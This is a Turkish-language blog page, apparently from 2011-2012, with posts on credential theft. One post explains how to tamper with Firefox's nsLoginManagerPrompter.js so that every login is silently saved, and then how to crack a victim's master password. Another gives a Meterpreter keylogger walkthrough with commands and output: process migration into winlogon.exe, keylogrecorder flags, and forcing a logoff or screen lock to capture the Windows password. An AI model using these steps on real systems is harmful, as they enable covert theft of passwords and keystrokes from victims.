Aslında yeni bir yöntem anlatmayacağım eski versiyonda olan yöntemi güncellenmiş halde veriyorum.
eski versiyonlarda omni.jar olarak bilinen yeni versiyonda omni.ja olarak adı değiştirilen jar dosyası içinde nsLoginManagerPrompter.js adlı dosyada biraz değişiklik yaparak kullanıcı adı ve parola ile girişlerinizin size sormadan otomatik olarak sqlite veritabanına kaydedilmesini sağlıyoruz ve daha FirefoxPasswordViewer programıyla kaydedilmiş bilgileri öğrenebiliyoruz (bu program yerine kendi kodumu geliştiriyorum)
bu dosya içerisinde
canRememberLogin değerini false yapan bütün kısımları iptal edersen tüm parolalar veritabanına kaydedilir.
ayrıca _showSaveLoginNotification parametresini kapatarak da kaydedip kaydetmeyeceği uyarısını engelleyebilirsin ama bence bu uyarı çıksın adam kaydetme dese bile sen arka planda canRememberLogin i değiştirdiğin için kaydedecektir (test etme fırsatım olmadı)
Firefox ta kaydedilen şifreleri korumak için master password oluşturabilirsiniz fakat default olarak bu kapalıdır. Varsayalım ki kurban master password koymuş bu durumda
http://securityxploded.com/firemaster.php
adresinden indirebileceğiniz firemaster uygulaması ile dictionary,bruteforce gibi ataklarla bu şifreyi kırabilirsiniz.
Firemaster uygulamasının source kodu açık olduğu için oradaki kodları kullanarak kendinizde dictionary hybrid (akıllı dictionarı yani varolan kelimeleri birleştirerek), brute force saldırı yapabilen bir tool yazabilirsiniz
keylogger etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
keylogger etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
11 Nisan 2012 Çarşamba
23 Kasım 2011 Çarşamba
Meterpereter Keylogger Sorunu
Evet,bazen nedense keylogger işlemiyor bu gibi durumlarda meterpereter session ı açtıktan sonra
windows şifresini almak için de önce winlogon.exe processine migrate olmanız gerekiyor.
run keylogrecorder -c 0 komutunu çalıştırırsanız
[*] explorer.exe Process found, migrating into 2812 [*] Migration Successful!! [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to
C:/Users/Faruk/.msf3/logs/scripts/keylogrecorder/....txt [*] Recording
şeklinde bir sonuç alırsınız
yada
meterpreter > getsystem ...got system (via technique 1). meterpreter > run keylogrecorder -c 0 -t 15 [*] spshell.exe Process found, migrating into 1980
bunu deneyebilirsiniz...
windows şifresini almak için de önce winlogon.exe processine migrate olmanız gerekiyor.
meterpreter> ps Process list ============ PID Name Arch Session User --- ---- ---- ------- ---- 0 [System Process] 4 System x86 0 NT AUTHORITY\SYSTEM 544 smss.exe x86 0 NT AUTHORITY\SYSTEM 608 csrss.exe x86 0 NT AUTHORITY\SYSTEM 2976 winlogon.exe x86 0 NT AUTHORITY\SYSTEM meterpreter > migrate 2976 [*] Migrating to 2976... [*] Migration completed successfully.
c - açık olan oturumlardan hangisine bağlanmak istiyorsunuz.
0 varsayılan ilk oturumdur.
l - kişiyi logoff olmaya zorlar bu asyede beklemeden windows
şifresini alabilirsiniz.
t - kaç saniyede bir keyleri almasını istiyorsunuz.
meterpreter> run keylogrecorder -c 1 -l -t 5 [*] Locking Screen... [*] Screen has been locked [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf3/logs/scripts/... [*] Recording
Kaydol:
Kayıtlar (Atom)